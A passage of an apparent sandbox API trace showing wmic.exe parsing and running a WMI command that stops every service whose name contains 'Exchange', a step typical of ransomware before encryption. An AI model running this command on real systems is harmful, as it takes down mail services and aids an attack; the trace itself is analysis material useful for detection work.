_String2="\"NULL\"") returned 78 [0309.942] malloc (_Size=0xa) returned 0x7dabe8 [0309.942] malloc (_Size=0x4) returned 0x7d2ee8 [0309.942] free (_Block=0x0) [0309.942] free (_Block=0x7dabd0) [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] malloc (_Size=0x1c) returned 0x7d9da8 [0309.942] lstrlenW (lpString="Win32_Service") returned 13 [0309.942] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0309.942] malloc (_Size=0x1c) returned 0x7d0568 [0309.943] malloc (_Size=0x8) returned 0x7d0590 [0309.943] memmove_s (in: _Destination=0x7d0590, _DestinationSize=0x4, _Source=0x7d2ee8, _SourceSize=0x4 | out: _Destination=0x7d0590) returned 0x0 [0309.943] free (_Block=0x7d2ee8) [0309.943] free (_Block=0x0) [0309.943] free (_Block=0x7d9da8) [0309.943] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.943] malloc (_Size=0xc) returned 0x7dab70 [0309.943] lstrlenW (lpString="where") returned 5 [0309.943] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0309.943] malloc (_Size=0xc) returned 0x7dabd0 [0309.943] malloc (_Size=0xc) returned 0x7dac18 [0309.943] memmove_s (in: _Destination=0x7dac18, _DestinationSize=0x8, _Source=0x7d0590, _SourceSize=0x8 | out: _Destination=0x7dac18) returned 0x0 [0309.943] free (_Block=0x7d0590) [0309.943] free (_Block=0x0) [0309.943] free (_Block=0x7dab70) [0309.943] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.943] malloc (_Size=0x36) returned 0x7db188 [0309.943] lstrlenW (lpString="\"name like '%%Exchange%%'\"") returned 26 [0309.943] _wcsicmp (_String1="\"name like '%%Exchange%%'\"", _String2="\"NULL\"") returned -20 [0309.943] lstrlenW (lpString="\"name like '%%Exchange%%'\"") returned 26 [0309.943] lstrlenW (lpString="\"name like '%%Exchange%%'\"") returned 26 [0309.943] malloc (_Size=0x36) returned 0x7db1c8 [0309.943] malloc (_Size=0x10) returned 0x7dac90 [0309.943] memmove_s (in: _Destination=0x7dac90, _DestinationSize=0xc, _Source=0x7dac18, _SourceSize=0xc | out: _Destination=0x7dac90) returned 0x0 [0309.943] free (_Block=0x7dac18) [0309.943] free (_Block=0x0) [0309.943] free (_Block=0x7db188) [0309.944] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.944] malloc (_Size=0xa) returned 0x7dab70 [0309.944] lstrlenW (lpString="call") returned 4 [0309.944] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0309.944] malloc (_Size=0xa) returned 0x7dac18 [0309.944] malloc (_Size=0x18) returned 0x7d2c40 [0309.944] memmove_s (in: _Destination=0x7d2c40, _DestinationSize=0x10, _Source=0x7dac90, _SourceSize=0x10 | out: _Destination=0x7d2c40) returned 0x0 [0309.944] free (_Block=0x7dac90) [0309.944] free (_Block=0x0) [0309.944] free (_Block=0x7dab70) [0309.944] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.944] malloc (_Size=0x18) returned 0x7d2cc0 [0309.944] lstrlenW (lpString="stopservice") returned 11 [0309.944] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0309.944] malloc (_Size=0x18) returned 0x7d2ce0 [0309.944] free (_Block=0x0) [0309.944] free (_Block=0x7d2cc0) [0309.944] malloc (_Size=0x18) returned 0x7d2c00 [0309.944] lstrlenW (lpString="QUIT") returned 4 [0309.944] lstrlenW (lpString="path") returned 4 [0309.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0309.944] lstrlenW (lpString="EXIT") returned 4 [0309.944] lstrlenW (lpString="path") returned 4 [0309.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0309.944] free (_Block=0x7d2c00) [0309.944] WbemLocator:IUnknown:AddRef (This=0x5648f0) returned 0x2 [0309.945] malloc (_Size=0x18) returned 0x7d2a80 [0309.945] lstrlenW (lpString="/") returned 1 [0309.945] lstrlenW (lpString="path") returned 4 [0309.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0309.945] lstrlenW (lpString="-") returned 1 [0309.945] lstrlenW (lpString="path") returned 4 [0309.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0309.945] lstrlenW (lpString="CLASS") returned 5 [0309.945] lstrlenW (lpString="path") returned 4 [0309.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0309.945] lstrlenW (lpString="PATH") returned 4 [0309.945] lstrlenW (lpString="path") returned 4 [0309.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0309.945] lstrlenW (lpString="/") returned 1 [0309.945] lstrlenW (lpString="Win32_Service") returned 13 [0309.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0309.945] lstrlenW (lpString="-") returned 1 [0309.945] lstrlenW (lpString="Win32_Service") returned 13 [0309.945] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0309.945] lstrlenW (lpString="Win32_Service") returned 13 [0309.945] malloc (_Size=0x1c) returned 0x7d9da8 [0309.945] lstrlenW (lpString="Win32_Service") returned 13 [0309.946] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xc8d923b4 | out: _String="Win32_Service", _Context=0xc8d923b4) returned="Win32_Service" [0309.946] lstrlenW (lpString="Win32_Service") returned 13 [0309.946] malloc (_Size=0x1c) returned 0x7db188 [0309.946] lstrlenW (lpString="Win32_Service") returned 13 [0309.946] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xc8d923b4 | out: _String=0x0, _Context=0xc8d923b4) returned 0x0 [0309.946] lstrlenW (lpString="") returned 0 [0309.946] lstrlenW (lpString="WHERE") returned 5 [0309.946] lstrlenW (lpString="where") returned 5 [0309.946] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0309.946] lstrlenW (lpString="/") returned 1 [0309.946] lstrlenW (lpString="name like '%%Exchange%%'") returned 24 [0309.946] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%Exchange%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0309.946] lstrlenW (lpString="-") returned 1 [0309.946] lstrlenW (lpString="name like '%%Exchange%%'") returned 24 [0309.946] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%Exchange%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0309.946] lstrlenW (lpString="name like '%%Exchange%%'") returned 24 [0309.946] malloc (_Size=0x32) returned 0x7db208 [0309.946] lstrlenW (lpString="name like '%%Exchange%%'") returned 24 [0309.946] lstrlenW (lpString="/") returned 1 [0309.946] lstrlenW (lpString="call") returned 4 [0309.946] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0309.946] lstrlenW (lpString="-") returned 1 [0309.946] lstrlenW (lpString="call") returned 4 [0309.946] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0309.946] lstrlenW (lpString="call") returned 4 [0309.947] malloc (_Size=0xa) returned 0x7dab70 [0309.947] lstrlenW (lpString="call") returned 4 [0309.947] lstrlenW (lpString="GET") returned 3 [0309.947] lstrlenW (lpString="call") returned 4 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0309.947] lstrlenW (lpString="LIST") returned 4 [0309.947] lstrlenW (lpString="call") returned 4 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0309.947] lstrlenW (lpString="SET") returned 3 [0309.947] lstrlenW (lpString="call") returned 4 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0309.947] lstrlenW (lpString="CREATE") returned 6 [0309.947] lstrlenW (lpString="call") returned 4 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0309.947] lstrlenW (lpString="CALL") returned 4 [0309.947] lstrlenW (lpString="call") returned 4 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0309.947] lstrlenW (lpString="/") returned 1 [0309.947] lstrlenW (lpString="stopservice") returned 11 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0309.947] lstrlenW (lpString="-") returned 1 [0309.947] lstrlenW (lpString="stopservice") returned 11 [0309.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0309.947] lstrlenW (lpString="stopservice") returned 11 [0309.947] malloc (_Size=0x18) returned 0x7d2b00 [0309.947] lstrlenW (lpString="stopservice") returned 11 [0309.947] ??0CHString@@QAE@XZ () returned 0x11d61c [0309.947] GetCurrentThreadId () returned 0x11b8 [0309.948] GetCurrentThreadId () returned 0x11b8 [0309.948] ??0CHString@@QAE@XZ () returned 0x11d5a4 [0309.948] malloc (_Size=0x4) returned 0x7d2ee8 [0309.948] malloc (_Size=0xc) returned 0x7dac90 [0309.948] malloc (_Size=0xc) returned 0x7dae28 [0309.948] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5648f0, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x56ae60) returned 0x0 [0310.049] free (_Block=0x7dae28) [0310.049] CoSetProxyBlanket (pProxy=0x56ae60, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0310.050] free (_Block=0x7d2ee8) [0310.050] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0310.050] free (_Block=0x7dac90) [0310.050] malloc (_Size=0xc) returned 0x7dac90 [0310.050] IWbemServices:GetObject (in: This=0x56ae60, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x11d634*=0x0, ppCallResult=0x0 | out: ppObject=0x11d634*=0x5c0a80, ppCallResult=0x0) returned 0x0 [0310.127] free (_Block=0x7dac90) [0310.127] IWbemClassObject:BeginMethodEnumeration (This=0x5c0a80, lEnumFlags=0) returned 0x0 [0310.128] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="StartService", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x5c0c78) returned 0x0 [0310.128] lstrlenW (lpString="StartService") returned 12 [0310.128] lstrlenW (lpString="stopservice") returned 11 [0310.128] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0310.128] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.128] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="StopService", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x5c0c78) returned 0x0 [0310.128] lstrlenW (lpString="StopService") returned 11 [0310.128] lstrlenW (lpString="stopservice") returned 11 [0310.128] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0310.128] malloc (_Size=0x38) returned 0x7db9b8 [0310.128] ??0CHString@@QAE@XZ () returned 0x11d184 [0310.128] GetCurrentThreadId () returned 0x11b8 [0310.129] IWbemClassObject:GetNames (in: This=0x5c0c78, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x11d194 | out: pNames=0x11d194*="\x01ƀ\x04") returned 0x0 [0310.129] SafeArrayGetLBound (in: psa=0x5c1240, nDim=0x1, plLbound=0x11d180 | out: plLbound=0x11d180) returned 0x0 [0310.129] SafeArrayGetUBound (in: psa=0x5c1240, nDim=0x1, plUbound=0x11d17c | out: plUbound=0x11d17c) returned 0x0 [0310.129] SafeArrayGetElement (in: psa=0x5c1240, rgIndices=0x11d188, pv=0x11d198 | out: pv=0x11d198) returned 0x0 [0310.129] malloc (_Size=0x24) returned 0x7db9f8 [0310.129] IWbemClassObject:GetPropertyQualifierSet (in: This=0x5c0c78, wszProperty="ReturnValue", ppQualSet=0x11d0a8 | out: ppQualSet=0x11d0a8*=0x56aba0) returned 0x0 [0310.130] malloc (_Size=0xc) returned 0x7dac90 [0310.130] IWbemQualifierSet:Get (in: This=0x56aba0, wszName="CIMTYPE", lFlags=0, pVal=0x11d078*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x11d078*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0310.130] free (_Block=0x7dac90) [0310.130] malloc (_Size=0xc) returned 0x7dac90 [0310.130] IWbemClassObject:Get (in: This=0x5c0c78, wszName="ReturnValue", lFlags=0, pVal=0x11d050*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x11d08c*=1167476, plFlavor=0x0 | out: pVal=0x11d050*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x11d08c*=19, plFlavor=0x0) returned 0x0 [0310.130] malloc (_Size=0xc) returned 0x7dae28 [0310.130] IWbemQualifierSet:Get (in: This=0x56aba0, wszName="read", lFlags=0, pVal=0x11d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x11d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0310.130] free (_Block=0x7dae28) [0310.130] malloc (_Size=0xc) returned 0x7dae10 [0310.130] IWbemQualifierSet:Get (in: This=0x56aba0, wszName="write", lFlags=0, pVal=0x11d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x11d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0310.130] free (_Block=0x7dae10) [0310.131] malloc (_Size=0xc) returned 0x7daea0 [0310.131] malloc (_Size=0xc) returned 0x7dae58 [0310.131] IWbemQualifierSet:Get (in: This=0x56aba0, wszName="Description", lFlags=0, pVal=0x11d068*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x11d068*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0310.131] free (_Block=0x7dae58) [0310.131] malloc (_Size=0xc) returned 0x7daeb8 [0310.131] lstrlenA (lpString="Not Available") returned 13 [0310.131] malloc (_Size=0x1c) returned 0x7dba28 [0310.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x7dba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0310.131] free (_Block=0x7dba28) [0310.131] IUnknown:Release (This=0x56aba0) returned 0x0 [0310.131] malloc (_Size=0x24) returned 0x7dba28 [0310.131] malloc (_Size=0xc) returned 0x7daed0 [0310.131] malloc (_Size=0x24) returned 0x7dba58 [0310.131] malloc (_Size=0x38) returned 0x7dba88 [0310.131] malloc (_Size=0x24) returned 0x7dbac8 [0310.131] free (_Block=0x7dba58) [0310.131] free (_Block=0x7dba28) [0310.131] free (_Block=0x7db9f8) [0310.131] free (_Block=0x7daea0) [0310.131] free (_Block=0x7daeb8) [0310.131] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0310.132] IWbemClassObject:GetMethodQualifierSet (in: This=0x5c0a80, wszMethod="StopService", ppQualSet=0x11d59c | out: ppQualSet=0x11d59c*=0x595428) returned 0x0 [0310.132] malloc (_Size=0xc) returned 0x7dae40 [0310.132] IWbemQualifierSet:Get (in: This=0x595428, wszName="Implemented", lFlags=0, pVal=0x11d584*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x11d584*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0310.132] free (_Block=0x7dae40) [0310.132] malloc (_Size=0xc) returned 0x7dae28 [0310.132] malloc (_Size=0xc) returned 0x7daeb8 [0310.132] IWbemQualifierSet:Get (in: This=0x595428, wszName="Description", lFlags=0, pVal=0x11d574*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x11d574*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0310.133] free (_Block=0x7daeb8) [0310.133] malloc (_Size=0xc) returned 0x7daea0 [0310.133] IUnknown:Release (This=0x595428) returned 0x0 [0310.133] malloc (_Size=0x38) returned 0x7db9f8 [0310.133] malloc (_Size=0x38) returned 0x7dba38 [0310.133] malloc (_Size=0x24) returned 0x7dbaf8 [0310.133] malloc (_Size=0xc) returned 0x7daeb8 [0310.133] malloc (_Size=0x38) returned 0x7dbb28 [0310.133] malloc (_Size=0x38) returned 0x7dbb68 [0310.133] malloc (_Size=0x24) returned 0x7dbba8 [0310.133] malloc (_Size=0x28) returned 0x7dbbd8 [0310.133] malloc (_Size=0x38) returned 0x7dbc08 [0310.133] malloc (_Size=0x38) returned 0x7dbc48 [0310.133] malloc (_Size=0x24) returned 0x7dbc88 [0310.133] free (_Block=0x7dbba8) [0310.133] free (_Block=0x7dbb68) [0310.133] free (_Block=0x7dbb28) [0310.133] free (_Block=0x7dbaf8) [0310.133] free (_Block=0x7dba38) [0310.133] free (_Block=0x7db9f8) [0310.133] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.133] free (_Block=0x7dbac8) [0310.133] free (_Block=0x7dba88) [0310.133] free (_Block=0x7db9b8) [0310.134] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="PauseService", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x597380) returned 0x0 [0310.134] lstrlenW (lpString="PauseService") returned 12 [0310.134] lstrlenW (lpString="stopservice") returned 11 [0310.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0310.134] IUnknown:Release (This=0x597380) returned 0x0 [0310.134] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="ResumeService", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x597380) returned 0x0 [0310.134] lstrlenW (lpString="ResumeService") returned 13 [0310.134] lstrlenW (lpString="stopservice") returned 11 [0310.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0310.134] IUnknown:Release (This=0x597380) returned 0x0 [0310.134] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="InterrogateService", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x597380) returned 0x0 [0310.134] lstrlenW (lpString="InterrogateService") returned 18 [0310.134] lstrlenW (lpString="stopservice") returned 11 [0310.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0310.134] IUnknown:Release (This=0x597380) returned 0x0 [0310.134] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="UserControlService", ppInSignature=0x11d63c*=0x5c0c78, ppOutSignature=0x11d638*=0x5c35a8) returned 0x0 [0310.134] lstrlenW (lpString="UserControlService") returned 18 [0310.134] lstrlenW (lpString="stopservice") returned 11 [0310.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0310.135] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.135] IUnknown:Release (This=0x5c35a8) returned 0x0 [0310.135] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="Create", ppInSignature=0x11d63c*=0x5c0c78, ppOutSignature=0x11d638*=0x5c5700) returned 0x0 [0310.135] lstrlenW (lpString="Create") returned 6 [0310.135] lstrlenW (lpString="stopservice") returned 11 [0310.135] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0310.135] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.135] IUnknown:Release (This=0x5c5700) returned 0x0 [0310.135] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="Change", ppInSignature=0x11d63c*=0x5c0c78, ppOutSignature=0x11d638*=0x5c5480) returned 0x0 [0310.135] lstrlenW (lpString="Change") returned 6 [0310.135] lstrlenW (lpString="stopservice") returned 11 [0310.135] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0310.136] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.136] IUnknown:Release (This=0x5c5480) returned 0x0 [0310.136] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="ChangeStartMode", ppInSignature=0x11d63c*=0x5c0c78, ppOutSignature=0x11d638*=0x5c3730) returned 0x0 [0310.136] lstrlenW (lpString="ChangeStartMode") returned 15 [0310.136] lstrlenW (lpString="stopservice") returned 11 [0310.136] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0310.136] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.136] IUnknown:Release (This=0x5c3730) returned 0x0 [0310.136] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="Delete", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x597380) returned 0x0 [0310.136] lstrlenW (lpString="Delete") returned 6 [0310.136] lstrlenW (lpString="stopservice") returned 11 [0310.136] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0310.136] IUnknown:Release (This=0x597380) returned 0x0 [0310.136] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="GetSecurityDescriptor", ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x5c0c78) returned 0x0 [0310.136] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0310.136] lstrlenW (lpString="stopservice") returned 11 [0310.136] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0310.136] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.136] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*="SetSecurityDescriptor", ppInSignature=0x11d63c*=0x5c0c78, ppOutSignature=0x11d638*=0x5c35a8) returned 0x0 [0310.136] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0310.137] lstrlenW (lpString="stopservice") returned 11 [0310.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0310.137] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.137] IUnknown:Release (This=0x5c35a8) returned 0x0 [0310.137] IWbemClassObject:NextMethod (in: This=0x5c0a80, lFlags=0, pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0 | out: pstrName=0x11d640*=0x0, ppInSignature=0x11d63c*=0x0, ppOutSignature=0x11d638*=0x0) returned 0x40005 [0310.137] IUnknown:Release (This=0x5c0a80) returned 0x0 [0310.137] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0310.137] lstrlenW (lpString="SET") returned 3 [0310.137] lstrlenW (lpString="call") returned 4 [0310.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0310.137] lstrlenW (lpString="CREATE") returned 6 [0310.137] lstrlenW (lpString="call") returned 4 [0310.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0310.137] free (_Block=0x7d2a80) [0310.137] malloc (_Size=0x4) returned 0x7d2ee8 [0310.137] lstrlenW (lpString="GET") returned 3 [0310.137] lstrlenW (lpString="call") returned 4 [0310.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0310.137] lstrlenW (lpString="LIST") returned 4 [0310.137] lstrlenW (lpString="call") returned 4 [0310.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0310.137] lstrlenW (lpString="ASSOC") returned 5 [0310.137] lstrlenW (lpString="call") returned 4 [0310.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0310.137] WbemLocator:IUnknown:AddRef (This=0x5648f0) returned 0x3 [0310.137] free 